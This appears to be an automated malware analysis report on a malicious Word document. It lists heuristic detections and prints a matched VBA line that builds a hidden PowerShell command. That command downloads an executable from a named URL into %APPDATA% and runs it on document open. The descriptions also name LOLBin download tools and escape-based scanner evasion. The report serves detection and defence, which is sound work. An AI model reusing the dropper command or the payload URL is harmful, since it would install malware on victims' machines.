Malicious Office (OLE) — malware analysis report

Heuristics 10

• VBA macros detected medium 6 related findings OLE_VBA_MACROS
  Document contains VBA macro code
• Potential Shell call in VBA critical OLE_VBA_SHELL
  Potential Shell call in VBA
  Matched line in script

  fExecute = Shell(sVarName1, sVarName2)

• PowerShell reference in VBA critical OLE_VBA_PS
  PowerShell reference in VBA
  Matched line in script

  PShellCode = "PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://www.assetsoption.com/wordpress/server3crypt.exe','%APPDATA%\server3crypt.exe');Start-Process '%APPDATA%\server3crypt.exe'"

• VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
  The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
  Matched line in script

  Private Sub Document_New()

• VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
• Document_Open macro low OLE_VBA_DOCOPEN
  Document_Open macro
  Matched line in script

  Private Sub Document_Open()

• Environ() call (env variable access) low OLE_VBA_ENVIRON
  Environ() call (env variable access)
  Matched line in script

  fGetPath = Environ$(sVarName1)

• Reference to PowerShell high SC_STR_POWERSHELL
  Reference to PowerShell
• LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
  Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
• Embedded URL info EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL https://www.assetsoption.com/wordpress/server3crypt.exe In document text (OLE body)

  • http://ns.adobe.com/xap/1.0/In document text (OLE body)
  • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
  • http://purl.org/dc/elements/1.1/In document text (OLE body)
  • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
  • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
  • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
  • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
  • http://ns.adobe.com/exif/1.0/In document text (OLE body)
  • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Open this report in the interactive analyzer, or submit your own file for analysis.